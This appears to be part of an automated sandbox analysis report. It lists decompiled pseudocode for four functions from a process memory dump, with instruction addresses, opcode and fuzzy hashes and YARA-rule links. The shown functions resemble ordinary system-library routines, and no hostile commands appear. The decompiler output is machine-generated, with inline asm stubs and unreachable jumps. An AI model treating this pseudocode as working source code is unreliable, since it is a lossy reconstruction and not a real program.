                                                    0x04b5f009
                                                    0x04b5f00d
                                                    0x00000000
                                                    0x04b5f00d
                                                    0x04b5efd0
                                                    0x04b5ef97
                                                    0x04b5efa5
                                                    0x04b5efaa
                                                    0x00000000
                                                    0x04b5efac
                                                    0x04b5efac
                                                    0x04b5efac
                                                    0x00000000
                                                    0x04b5efb2
                                                    0x04b5f036
                                                    0x04b5f03a
                                                    0x04b5f040
                                                    0x04b5f090
                                                    0x00000000
                                                    0x04b5f092
                                                    0x04b5f042
                                                    0x00000000
                                                    0x04b5f042
                                                    0x04b5efb7
                                                    0x04b5efb9
                                                    0x04b5efbc
                                                    0x04b5efb0
                                                    0x04b5efb0
                                                    0x00000000
                                                    0x04b5efbe
                                                    0x04b5efbe
                                                    0x04b5efc1
                                                    0x00000000
                                                    0x04b5efc1
                                                    0x04b5efbc
                                                    0x04b5efaa
                                                    0x04b5ef91

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                    • Instruction ID: b1c71a5f5e0566eb469345dd3cb1e12bfec2dfa671468e4534f600c30b1b90cc
                                                    • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                    • Instruction Fuzzy Hash: 8A51F030A083499BEB20CF68C0907AEFBB1EF05314F1C81E9DA55972A1D775BA89D741
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04C1740D, Relevance: .1, Instructions: 141COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 84%
                                                    			E04C1740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E04B9D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E04B8F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L04B64620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L04B64620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E04B8F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L04B64620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                    0x04c1740d
                                                    0x04c1740d
                                                    0x04c17412
                                                    0x04c17413
                                                    0x04c17416
                                                    0x04c17418
                                                    0x04c1741c
                                                    0x04c1741f
                                                    0x04c17422
                                                    0x04c17422
                                                    0x04c17428
                                                    0x04c1742a
                                                    0x04c1742a
                                                    0x04c17451
                                                    0x04c17432
                                                    0x04c1744f
                                                    0x04c1744f
                                                    0x00000000
                                                    0x04c17434
                                                    0x04c17438
                                                    0x04c17443
                                                    0x04c17517
                                                    0x04c17517
                                                    0x04c1751a
                                                    0x04c17535
                                                    0x04c17520
                                                    0x04c17527
                                                    0x04c1752c
                                                    0x04c17531
                                                    0x04c17533
                                                    0x00000000
                                                    0x04c17533
                                                    0x00000000
                                                    0x04c17531
                                                    0x04c1754b
                                                    0x04c1754f
                                                    0x04c1755c
                                                    0x04c1755c
                                                    0x04c1755f
                                                    0x04c17560
                                                    0x04c17561
                                                    0x04c17562
                                                    0x04c17563
                                                    0x04c17568
                                                    0x04c1756a
                                                    0x04c1756c
                                                    0x04c1756d
                                                    0x04c1756d
                                                    0x04c1756f
                                                    0x04c17572
                                                    0x04c17574
                                                    0x04c17577
                                                    0x04c1757c
                                                    0x04c1757f
                                                    0x00000000
                                                    0x04c17551
                                                    0x04c17551
                                                    0x04c17551
                                                    0x04c17553
                                                    0x04c17553
                                                    0x04c17449
                                                    0x04c17449
                                                    0x04c1744c
                                                    0x04c1744c
                                                    0x00000000
                                                    0x04c1744c
                                                    0x04c17443
                                                    0x04c1750e
                                                    0x04c17514
                                                    0x04c17514
                                                    0x04c17455
                                                    0x04c17469
                                                    0x04c1746d
                                                    0x00000000
                                                    0x04c17473
                                                    0x04c17473
                                                    0x04c17476
                                                    0x04c17480
                                                    0x04c17484
                                                    0x04c1748e
                                                    0x04c17493
                                                    0x04c17493
                                                    0x04c17496
                                                    0x04c17499
                                                    0x04c174a1
                                                    0x04c174b1
                                                    0x04c174b5
                                                    0x00000000
                                                    0x04c174bb
                                                    0x04c174c1
                                                    0x04c174c1
                                                    0x04c174c4
                                                    0x04c174c5
                                                    0x04c174c6
                                                    0x04c174c7
                                                    0x04c174c8
                                                    0x04c174cd
                                                    0x00000000
                                                    0x04c174d3
                                                    0x04c174d3
                                                    0x04c174d6
                                                    0x04c174d8
                                                    0x04c174db
                                                    0x04c174dd
                                                    0x04c174e0
                                                    0x04c174e7
                                                    0x04c174ee
                                                    0x04c174ee
                                                    0x04c174f4
                                                    0x04c174f9
                                                    0x00000000
                                                    0x04c174fb
                                                    0x04c174fb
                                                    0x04c174fd
                                                    0x04c17500
                                                    0x04c17503
                                                    0x04c17505
                                                    0x04c17505
                                                    0x04c174f9
                                                    0x00000000
                                                    0x04c174cd
                                                    0x04c174b5
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                    • Instruction ID: 9c82f75a027bf6c601e15b57d3a6a7549e2f5af0a58cf583d7a509038f4c300f
                                                    • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                    • Instruction Fuzzy Hash: 0C518D71601606EFDB15CF54C480A56BBB6FF46304F18C0AAE9099F221E371FA46DF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B72990, Relevance: .1, Instructions: 133COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 97%
                                                    			E04B72990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x4c1ff00);
				E04B9D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x4b21664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E04B8E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x4b21668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E04BC51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x4b2166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E04B72AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E04B56600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E04B72C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E04B5EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E04B72AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E04B72C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E04B72ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E04B9D0D1(_t62);
				goto L28;
			}





















                                                    0x04b72990
                                                    0x04b72992
                                                    0x04b72997
                                                    0x04b729a3
                                                    0x04b729a6
                                                    0x04b729ab
                                                    0x04b729ad
                                                    0x04b729b2
                                                    0x04bb5c80
                                                    0x04b729b8
                                                    0x04b729b8
                                                    0x04b729bb
                                                    0x04b729c0
                                                    0x04b729c5
                                                    0x04b729c6
                                                    0x04b729c6
                                                    0x04b729cb
                                                    0x00000000
                                                    0x00000000
                                                    0x04b729cd
                                                    0x04b729d0
                                                    0x04b729d9
                                                    0x04b729db
                                                    0x04b729dd
                                                    0x04b72a7f
                                                    0x04b72a84
                                                    0x04b72a87
                                                    0x04b72a89
                                                    0x04bb5ca1
                                                    0x04bb5ca3
                                                    0x00000000
                                                    0x04b72a8f
                                                    0x04b72a8f
                                                    0x00000000
                                                    0x04b72a8f
                                                    0x00000000
                                                    0x04b729e3
                                                    0x04b729e3
                                                    0x04b729e3
                                                    0x00000000
                                                    0x04b729e3
                                                    0x04b729dd
                                                    0x00000000
                                                    0x04b729db
                                                    0x04b729e6
                                                    0x04b729e9
                                                    0x04b729eb
                                                    0x04b729ed
                                                    0x04b729f3
                                                    0x04b729f5
                                                    0x04b729f8
                                                    0x04b729fa
                                                    0x04b72a97
                                                    0x04b72a9a
                                                    0x04b72a9d
                                                    0x04b72add
                                                    0x00000000
                                                    0x04b72a9f
                                                    0x04b72aa2
                                                    0x04b72aa5
                                                    0x04b72aa8
                                                    0x04b72aab
                                                    0x04bb5cab
                                                    0x04bb5caf
                                                    0x04bb5cc5
                                                    0x04bb5cda
                                                    0x04bb5cdc
                                                    0x04bb5cdf
                                                    0x04bb5ce5
                                                    0x00000000
                                                    0x04bb5ceb
                                                    0x04bb5ced
                                                    0x04bb5cee
                                                    0x00000000
                                                    0x04bb5cee
                                                    0x04bb5cb1
                                                    0x04bb5cb4
                                                    0x04bb5cb9
                                                    0x04bb5cbb
                                                    0x00000000
                                                    0x04bb5cbd
                                                    0x04bb5cbd
                                                    0x00000000
                                                    0x04bb5cbd
                                                    0x04bb5cbb
                                                    0x04b72ab1
                                                    0x04b72ab1
                                                    0x04b72ac4
                                                    0x04b72ac6
                                                    0x04b72ac6
                                                    0x00000000
                                                    0x04b72ac6
                                                    0x04b72aab
                                                    0x00000000
                                                    0x04b72a00
                                                    0x04b72a09
                                                    0x04b72a0e
                                                    0x04b72a21
                                                    0x04b72a24
                                                    0x04b72a35
                                                    0x04b72a3a
                                                    0x04b72a3d
                                                    0x04b72a42
                                                    0x04b72a59
                                                    0x04b72a59
                                                    0x04b72a5c
                                                    0x04b72a5f
                                                    0x04b72a5f
                                                    0x04b729fa
                                                    0x04b729f3
                                                    0x04b72a64
                                                    0x04b72a64
                                                    0x04b72a6b
                                                    0x04b72a6b
                                                    0x04b72a6d
                                                    0x04b72a72
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6dfa257426045e9353bcb26231f7fd5f6357afb5d5c203a7a7894e17291dfa7e
                                                    • Instruction ID: 584817bf2c4c1fb4e9c008ccddaabbb6c1b66959ad62f3d02facb934d953df79
                                                    • Opcode Fuzzy Hash: 6dfa257426045e9353bcb26231f7fd5f6357afb5d5c203a7a7894e17291dfa7e
                                                    • Instruction Fuzzy Hash: AA514971A00209AFDF29DF55C940ADEBBB6FF08314F1480E5E825AB260D375A952DB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B74D3B, Relevance: .1, Instructions: 131COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 78%
                                                    			E04B74D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x4c3d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E04B8FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x4c37bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E04B8B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L04B64620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E04B4CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E04B8B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E04B8F380(_t67 + 0xc, 0x4b25138, 0x10) == 0) {
								 *0x4c360d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E04B74F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E04B74E70(0x4c386b0, 0x4b75690, 0, 0) != 0) {
					_t46 = E04B4CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                    0x04b74d3b
                                                    0x04b74d4d
                                                    0x04b74d53
                                                    0x04b74d58
                                                    0x04b74d65
                                                    0x04b74d6c
                                                    0x04b74d71
                                                    0x04b74d77
                                                    0x04b74d7f
                                                    0x04b74d8c
                                                    0x04b74d8e
                                                    0x04b74dad
                                                    0x04b74db0
                                                    0x04b74db7
                                                    0x04b74db8
                                                    0x04b74db9
                                                    0x04b74dba
                                                    0x04b74dbb
                                                    0x04b74dc1
                                                    0x04b74dc8
                                                    0x04b74dcc
                                                    0x04b74dd5
                                                    0x04b74dde
                                                    0x04b74ddf
                                                    0x04b74de0
                                                    0x04b74de1
                                                    0x04b74de6
                                                    0x04b74de7
                                                    0x04b74de9
                                                    0x04b74df3
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb6c7c
                                                    0x04bb6c8a
                                                    0x04bb6c8a
                                                    0x04bb6c9d
                                                    0x04bb6ca7
                                                    0x04bb6cac
                                                    0x04bb6cb2
                                                    0x04bb6cb9
                                                    0x00000000
                                                    0x04bb6cbf
                                                    0x04bb6cbf
                                                    0x00000000
                                                    0x04bb6cbf
                                                    0x04bb6cb9
                                                    0x04b74dfb
                                                    0x04bb6ccf
                                                    0x04bb6cd3
                                                    0x04b74e32
                                                    0x04b74e39
                                                    0x04bb6ce0
                                                    0x04bb6cf2
                                                    0x04bb6cf2
                                                    0x04bb6ce0
                                                    0x04b74e3f
                                                    0x04b74e41
                                                    0x04b74e51
                                                    0x04b74e51
                                                    0x04b74e03
                                                    0x04b74e03
                                                    0x04b74e09
                                                    0x04b74e0f
                                                    0x04b74e57
                                                    0x00000000
                                                    0x00000000
                                                    0x04b74e1b
                                                    0x04b74e30
                                                    0x04b74e5b
                                                    0x04b74e5b
                                                    0x00000000
                                                    0x04b74e30
                                                    0x04b74e11
                                                    0x04b74e11
                                                    0x04b74e16
                                                    0x00000000
                                                    0x04b74e16
                                                    0x04b74e01
                                                    0x00000000
                                                    0x04b74e01
                                                    0x04b74da5
                                                    0x04bb6c6b
                                                    0x00000000
                                                    0x04b74dab
                                                    0x04b74dab
                                                    0x00000000
                                                    0x04b74dab

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7424c2779fe03d89cf71819cf7f464cb6e6d5f2311de875f5e384b4ec71b1433
                                                    • Instruction ID: 0aa2374bd4eec248efaae158e300e6b6e7e61766c464d48865cce405fa5c6250
                                                    • Opcode Fuzzy Hash: 7424c2779fe03d89cf71819cf7f464cb6e6d5f2311de875f5e384b4ec71b1433
                                                    • Instruction Fuzzy Hash: 0841E371A40318AFEB25DF14CD80FAAB7A9EB45724F0044D9E85997280D7B4FD40CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B74BAD, Relevance: .1, Instructions: 131COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 85%
                                                    			E04B74BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x4c3d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E04B4CC50(_t86);
					L11:
					return E04B8B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x4c38504
				E04B62280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E04B8FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E04B8B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L04B64620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E04B4CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x4c38504
								E04B5FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E04B74F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                    0x04b74bad
                                                    0x04b74bbf
                                                    0x04b74bc2
                                                    0x04b74bc6
                                                    0x04b74bcd
                                                    0x04b74bd9
                                                    0x04bb67fe
                                                    0x04bb6800
                                                    0x04b74ccc
                                                    0x04b74ccd
                                                    0x04b74cb7
                                                    0x04b74cc9
                                                    0x04b74cc9
                                                    0x04b74bdf
                                                    0x04b74be5
                                                    0x00000000
                                                    0x00000000
                                                    0x04b74beb
                                                    0x04b74bef
                                                    0x00000000
                                                    0x00000000
                                                    0x04b74bf5
                                                    0x04b74bf9
                                                    0x04b74c06
                                                    0x04b74c0b
                                                    0x04b74c17
                                                    0x04b74c1c
                                                    0x04b74c1f
                                                    0x04b74c25
                                                    0x04b74c33
                                                    0x04b74c3d
                                                    0x04b74c40
                                                    0x04b74c43
                                                    0x04b74c47
                                                    0x04b74c4d
                                                    0x04b74c53
                                                    0x04b74c54
                                                    0x04b74c55
                                                    0x04b74c56
                                                    0x04b74c5b
                                                    0x04b74c5c
                                                    0x04b74c63
                                                    0x04b74c6b
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb6776
                                                    0x04bb6784
                                                    0x04bb6784
                                                    0x04bb679f
                                                    0x04bb67a7
                                                    0x04bb67af
                                                    0x04bb67ce
                                                    0x00000000
                                                    0x04bb67b1
                                                    0x04bb67b7
                                                    0x04bb67b8
                                                    0x04bb67c1
                                                    0x04bb67d3
                                                    0x04bb67d9
                                                    0x04bb67dd
                                                    0x04b74c94
                                                    0x04b74c94
                                                    0x04b74c98
                                                    0x04b74c9c
                                                    0x04b74ca3
                                                    0x04bb67f4
                                                    0x04bb67f4
                                                    0x04b74cb5
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b74cb5
